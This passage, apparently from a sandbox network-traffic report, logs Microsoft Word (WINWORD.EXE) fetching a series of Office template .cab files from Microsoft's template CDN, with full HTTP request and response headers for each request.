    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22149
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC4992C63CE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f67f6439-f01e-00b9-7e97-a0db67000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2591108
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: vrEqBGTQlsozuupDUs6ADw==
    Last-Modified: Wed, 29 Aug 2018 18:18:42 GMT
    ETag: 0x8D60DDBD9E38C6B
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 657a3b26-501e-00bf-4a97-a02c1f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328925.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 25314
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC49952B1C0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7434c23b-501e-0073-4e97-a048aa000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03998159.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3417042
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
    Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
    ETag: 0x8D36AC8BD7E1FE9
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328932.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20554
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
    Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
    ETag: 0x8D36AC887A4CC19
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03998158.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 42788
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IaS3txYxwszaX7umN1Hw0g==
    Last-Modified: Fri, 22 Apr 2016 15:41:55 GMT
    ETag: 0x8D36AC4A24B210A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: da46b32d-701e-0081-5997-a09a3e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328935.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 23597
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC49996C1E0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328940.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21791
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499BA77A5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 579ed937-501e-0015-1e97-a0faf0000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328951.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19893
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
    Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
    ETag: 0x8D36AC8888436CF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8b7f2b9c-601e-00da-3797-a013cb000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328972.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21111
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
    ETag: 0x8D36AC888CEAFBE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d4301ed0-b01e-0122-0997-a0b138000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328975.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22594
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A2D135E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e960e28b-801e-0094-6497-a058a7000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328983.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21875
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
    ETag: 0x8D36AC88963C8B3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 719e0bb9-a01e-0053-5c97-a0a91e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328986.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22340
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A9463F7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 954c7b2e-e01e-0048-5b97-a00af4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328998.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21357
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: l/W3t+nhKBmZRopcQssS5w==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A7F05EE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328990.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19288
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A1DF716
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 295527
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
    Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
    ETag: 0x8D60DFAA9FC6013
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 9ae01919-001e-0028-0a97-a0eb82000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 276650
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
    Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
    ETag: 0x8D60DDB82865741
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 271273
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
    Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
    ETag: 0x8D60DDB967B9FA5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7297223a-101e-00d5-6197-a070b4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 550906
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
    Last-Modified: Wed, 29 Aug 2018 18:20:59 GMT
    ETag: 0x8D60DDC2BA71326
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 738e14d8-201e-0011-2f97-a00f72000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 640684
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
    Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
    ETag: 0x8D60DDB5C4DB3A1
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 698244
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
    Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
    ETag: 0x8D60DDB6CAEA91D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
